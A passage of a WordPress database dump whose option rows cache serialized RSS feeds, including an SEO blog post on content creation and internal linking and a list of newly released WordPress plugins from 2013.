dynamo</a> that is capable of fueling less competitive keywords through tactful internal links.</p>\n<p>Also, when considering that your website is only as strong as its weakest page, <em>leaving no page behind and giving it a function to act as a supporting page that links to more commercial landing pages or sculpting that page as a destination</em> is a great alternative to each page fending for itself with no continuity or links from contextual linking or navigation.</p>\n<p>In either case, the entire corpus of documents benefit (as the whole becomes stronger, more relevant and more interdependent) if you are leveraging the premise of tactful content creation and <a href=\"http://www.seodesignsolutions.com/blog/seo/how-semantic-connectivity-affects-seo/\">keyword occurrence</a>. The occurrence of a phrase can become a link to the appropriate landing page.</p>\n<p>Once you cross the tipping point for on page internal links, the page becomes buoyant. Don’t believe me, just think about the cohesiveness of Wikipedia and it’s no surprise while they are one of the most dominant websites in Google’s index ranking for millions of keywords as a result of their on-page structure and internal links.</p>\n<p>While you may not have a website the size of Wikipedia (most don’t), you do have the ability to create fresh content and also syndicate that content to social media sites, article directories, RSS aggregators and more to (a) generate more traffic and (b) cultivate relevant internal links which boost page level trust and PageRank and eventually <a href=\"http://www.seodesignsolutions.com/blog/seo/develop-domain-authority/\">domain authority</a> for the entire website.</p>\n<p>In closing, here is an alternative to content creation it&#8217;s called content curation and our friends at Network Empire are teaching a course &#8220;<a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/curation-intro-sign-up/\"><strong>Premium Content Curation</strong></a>&#8221; for those of you who are interested. Pass it along and as always, I hope you found this post useful and informative.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=nv1fnesjQlY:T4VTz2VBkow:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/nv1fnesjQlY\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:344:\"Today&#8217;s topic is creating content with purpose (adding fresh content on your website) which serves a dual purpose for SEO and user engagement. Both are equally important and necessary in the grand scheme of the evolution of your website. The first short-term purpose is to generate a surge of present-tense traffic. Even if your new [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"3\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:67:\"http://www.seodesignsolutions.com/blog/seo-basics/content-creation/\";}s:7:\"summary\";s:344:\"Today&#8217;s topic is creating content with purpose (adding fresh content on your website) which serves a dual purpose for SEO and user engagement. Both are equally important and necessary in the grand scheme of the evolution of your website. The first short-term purpose is to generate a surge of present-tense traffic. Even if your new [...]\";s:12:\"atom_content\";s:7042:\"<p><strong> </strong>Today&#8217;s topic is <strong>creating content with purpose</strong> (adding fresh content on your website) which serves a dual purpose for SEO and user engagement. Both are equally important and necessary in the grand scheme of the evolution of your website.</p>\n<div id=\"attachment_8991\" class=\"wp-caption aligncenter\" style=\"width: 357px\"><a href=\"http://www.seodesignsolutions.com/blog/seo-basics/content-creation/\"><img class=\"size-full wp-image-8991\" title=\"tactful-content-creation\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/10/tactful-content-creation.jpg\" alt=\"tactful content creation\" width=\"347\" height=\"346\" /></a><p class=\"wp-caption-text\">Create Content With Purpose</p></div>\n<p>The first short-term purpose is to generate a surge of <em>present-tense</em> traffic. Even if your new page or post generates 25 new visitors to your website in one day, reaching 100, 200 or 500 visitors per day is scalable by the introduction and syndication of new and / or relevant content.<span id=\"more-8990\"></span></p>\n<p>The second <em>long-term purpose</em> content creation serves is the ability for each page you create to age and transform into a <strong>powerful hub page</strong> (replete with PageRank, link-flow and ranking power) which can funnel link juice to more critical (<strong>spoke in the wheel</strong>) commercial pages with the express intent of getting those pages into the top 10 spotlight.</p>\n<p>As traffic and mileage may vary <em>from website to website</em> depending on the subject/topic, demand and/or authority of your website; in the instance of <a href=\"http://www.seodesignsolutions.com/\">SEO Design Solutions</a>, I know that I can generate additional 300-400 fresh visitors per day from one blog post over the average ambient traffic we receive to our website from the aged legacy content it houses.</p>\n<p>The other added benefit is the more content you have the more PageRank and authority you develop. The takeaway is that creating qualified, rich, engaging content not only wins you points from search engines, but will insulate your website from vacillations (rising and falling) if minor algorithmic changes threaten the relevancy and ranking landscape (if you were relying on off page backlinks alone).</p>\n<p>A proper SEO campaign should always involve the introduction of fresh/relevant content. Not so much to obfuscate links or link building as much as the on-page justification of giving search engines a reason to rank a website higher (from being a genuine resource).</p>\n<p>Search engines are based on a basic principle (1) crawl, index and store content and then (2) use that content to query against (with 200+ relevance and recency filters) to determine which group of websites are (a) trusted and (b) authoritative enough to rank in the <strong>“authority set”</strong> – the top 10 results.</p>\n<p>Aside from the two points made above about creating more traffic and leveraging pages eventually to foster additional buoyancy for landing pages. Content (and the quality and relevance of the content) is truly one of the more prominent metrics that search engines use when deciding who wins the click (as a result of where they are positioned in the search engines index).</p>\n<p>On page <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-and-internal-linking/\">internal linking</a> opportunities are also a side benefit of strategic content creation. By spanning the topical nodes of synonyms and other related phrases that pertain to the topic, you can sprinkle phrases in landing pages and / or supporting pages which you can use for internal links.</p>\n<p>These internal links carry more weight in the algorithm than links found in common areas like the footer, sidebar or navigation and a page that is a PageRank 3 internal page (for example) passes equally as much weight through a link as a link from another website/page from outside the website. This means the more pages in your website that have trust, relevance, PageRank/Link-flow or authority, the less you need to depend on backlinks to get ranked.</p>\n<p>When you understand the premise of theming your content (creating a main topic and nesting supporting keywords, articles and / or pages), your own website becomes a <a href=\"http://www.seodesignsolutions.com/blog/how-to-reference-material/how-to-consolidate-on-page-seo-with-content-navigation-and-links/\">powerful on-page dynamo</a> that is capable of fueling less competitive keywords through tactful internal links.</p>\n<p>Also, when considering that your website is only as strong as its weakest page, <em>leaving no page behind and giving it a function to act as a supporting page that links to more commercial landing pages or sculpting that page as a destination</em> is a great alternative to each page fending for itself with no continuity or links from contextual linking or navigation.</p>\n<p>In either case, the entire corpus of documents benefit (as the whole becomes stronger, more relevant and more interdependent) if you are leveraging the premise of tactful content creation and <a href=\"http://www.seodesignsolutions.com/blog/seo/how-semantic-connectivity-affects-seo/\">keyword occurrence</a>. The occurrence of a phrase can become a link to the appropriate landing page.</p>\n<p>Once you cross the tipping point for on page internal links, the page becomes buoyant. Don’t believe me, just think about the cohesiveness of Wikipedia and it’s no surprise while they are one of the most dominant websites in Google’s index ranking for millions of keywords as a result of their on-page structure and internal links.</p>\n<p>While you may not have a website the size of Wikipedia (most don’t), you do have the ability to create fresh content and also syndicate that content to social media sites, article directories, RSS aggregators and more to (a) generate more traffic and (b) cultivate relevant internal links which boost page level trust and PageRank and eventually <a href=\"http://www.seodesignsolutions.com/blog/seo/develop-domain-authority/\">domain authority</a> for the entire website.</p>\n<p>In closing, here is an alternative to content creation it&#8217;s called content curation and our friends at Network Empire are teaching a course &#8220;<a href=\"http://www.networkempire.com/dap/a/?a=152&amp;p=http://www.networkempire.com/curation-intro-sign-up/\"><strong>Premium Content Curation</strong></a>&#8221; for those of you who are interested. Pass it along and as always, I hope you found this post useful and informative.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=nv1fnesjQlY:T4VTz2VBkow:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/nv1fnesjQlY\" height=\"1\" width=\"1\"/>\";}}s:7:\"channel\";a:8:{s:5:\"title\";s:28:\"SEO Design Solutions™ Blog\";s:4:\"link\";s:38:\"http://www.seodesignsolutions.com/blog\";s:11:\"description\";s:94:\"Search Engine Optimization Strategies, Tips, Tactics and Techniques from SEO Design Solutions.\";s:8:\"language\";s:5:\"en-US\";s:13:\"lastbuilddate\";s:29:\"Tue, 06 Aug 2013 08:51:57 PDT\";s:2:\"sy\";a:2:{s:12:\"updateperiod\";s:6:\"hourly\";s:15:\"updatefrequency\";s:1:\"1\";}s:10:\"feedburner\";a:3:{s:14:\"emailserviceid\";s:22:\"SeoDesignSolutionsBlog\";s:18:\"feedburnerhostname\";s:28:\"http://feedburner.google.com\";s:9:\"feedflare\";s:391:\"Subscribe with My Yahoo!Subscribe with NewsGatorSubscribe with My AOLSubscribe with BloglinesSubscribe with NetvibesSubscribe with GoogleSubscribe with PageflakesSubscribe with PlusmoSubscribe with The Free DictionarySubscribe with Bitty BrowserSubscribe with Live.comSubscribe with Excite MIXSubscribe with WebwagSubscribe with Podcast ReadySubscribe with WikioSubscribe with Daily Rotation\";}s:7:\"tagline\";s:94:\"Search Engine Optimization Strategies, Tips, Tactics and Techniques from SEO Design Solutions.\";}s:9:\"textinput\";a:0:{}s:5:\"image\";a:0:{}s:9:\"feed_type\";s:3:\"RSS\";s:12:\"feed_version\";s:3:\"2.0\";s:5:\"stack\";a:0:{}s:9:\"inchannel\";b:0;s:6:\"initem\";b:0;s:9:\"incontent\";b:0;s:11:\"intextinput\";b:0;s:7:\"inimage\";b:0;s:13:\"current_field\";s:0:\"\";s:17:\"current_namespace\";b:0;s:19:\"_CONTENT_CONSTRUCTS\";a:6:{i:0;s:7:\"content\";i:1;s:7:\"summary\";i:2;s:4:\"info\";i:3;s:5:\"title\";i:4;s:7:\"tagline\";i:5;s:9:\"copyright\";}s:4:\"etag\";s:27:\"eSFHCIdmKvguNX1XiFZKCrW/jYI\";s:13:\"last_modified\";s:29:\"Mon, 04 Nov 2013 16:24:49 GMT\";}', 'no');
INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(3228, '_transient_timeout_feed_mod_b9388c83948825c1edaef0d856b7b109', '1383512002', 'no'),
(3229, '_transient_feed_mod_b9388c83948825c1edaef0d856b7b109', '1383468802', 'no'),
(3230, '_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1383512002', 'no'),
(3231, '_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca', '1383468802', 'no'),
(3236, '_transient_timeout_feed_mod_77fa140e07ce53fe8c87136636f83d72', '1383512003', 'no'),
(3237, '_transient_feed_mod_77fa140e07ce53fe8c87136636f83d72', '1383468803', 'no'),
(3233, '_transient_dash_4077549d03da2e451c8b5f002294ff51', '<div class=\"rss-widget\"><ul><li><a class=\'rsswidget\' href=\'http://wordpress.org/news/2013/10/wordpress-3-7-1/\' title=\'WordPress 3.7.1 is now available! This maintenance release addresses 11 bugs in WordPress 3.7, including: Images with captions no longer appear broken in the visual editor. Allow some sites running on old or poorly configured servers to continue to check for updates from WordPress.org. Avoid fatal errors with certain plugins that were incorrectly calling some […]\'>WordPress 3.7.1 Maintenance Release</a> <span class=\"rss-date\">October 29, 2013</span><div class=\'rssSummary\'>WordPress 3.7.1 is now available! This maintenance release addresses 11 bugs in WordPress 3.7, including: Images with captions no longer appear broken in the visual editor. Allow some sites running on old or poorly configured servers to continue to check for updates from WordPress.org. Avoid fatal errors with certain plugins that were incorrectly calling som [&hellip;]</div></li><li><a class=\'rsswidget\' href=\'http://wordpress.org/news/2013/10/basie/\' title=\'Version 3.7 of WordPress, named “Basie” in honor of Count Basie, is available for download or update in your WordPress dashboard. This release features some of the most important architectural updates we’ve made to date. Here are the big ones: Updates while you sleep: With WordPress 3.7, you don’t have to lift a finger to […]\'>WordPress 3.7 “Basie”</a> <span class=\"rss-date\">October 24, 2013</span><div class=\'rssSummary\'>Version 3.7 of WordPress, named “Basie” in honor of Count Basie, is available for download or update in your WordPress dashboard. This release features some of the most important architectural updates we’ve made to date. Here are the big ones: Updates while you sleep: With WordPress 3.7, you don’t have to lift a finger to […]</div></li></ul></div>', 'no'),
(3234, '_transient_timeout_feed_77fa140e07ce53fe8c87136636f83d72', '1383512003', 'no'),
(3235, '_transient_feed_77fa140e07ce53fe8c87136636f83d72', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n	\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:72:\"\n		\n		\n		\n		\n		\n		\n				\n\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n		\n\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress Plugins » View: Newest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"http://wordpress.org/plugins/browse/new/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress Plugins » View: Newest\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 03 Nov 2013 08:25:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:25:\"http://bbpress.org/?v=1.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:15:{i:0;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"Cooked\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"http://wordpress.org/plugins/cooked/#post-60158\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 05:09:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60158@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:134:\"Cooking plugin that goes beyond just managing recipes. It allows the chef to detail the ingredients to be used as their own post type.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"danieliser\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Remove Protected\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://wordpress.org/plugins/remove-protected/#post-60172\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 03 Nov 2013 01:00:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60172@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:106:\"Small script that removes &#34;Protected:&#34; from titles of posts and pages that are password protected.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aubrey Portwood\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Automatic Comment SPAM Disable\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"http://wordpress.org/plugins/automatic-comment-spam-disable/#post-60165\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 02 Nov 2013 20:18:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60165@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"Detects comment SPAM and deletes it automatically.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"valiik\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"UDSSL Time Tracker\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"http://wordpress.org/plugins/udssl-time-tracker/#post-60132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 07:17:38 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60132@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:149:\"UDSSL Time Tracker helps you to precisely track your time. Charts allows you to visualize how your time is spent and helps you to be more productive.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"UDSSL\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"MaxGalleria Lite: WordPress Gallery Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"http://wordpress.org/plugins/maxgalleria-lite/#post-59950\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 29 Oct 2013 04:26:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59950@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"Create great-looking responsive image galleries with ease.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"maxfoundry\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:5;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Snap Skout Sharebar\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wordpress.org/plugins/snapskout/#post-59820\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 24 Oct 2013 16:40:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"59820@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"Snap Skout Social Sharebar Plugin &#124; Promoting Discovery, Engagement and Sharing\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"talktup\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:6;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"ProductListers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"http://wordpress.org/plugins/productlisters/#post-60139\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 01 Nov 2013 14:13:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"60139@http://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:131:\"This plugin generates a XML file which can be used for ProductListers.com\nand converts your website to a social and mobile booster.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Productlisters\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:7;a:6:{s:4:\"data\";s:30:\"\n			\n			\n			\n			\n			\n			\n					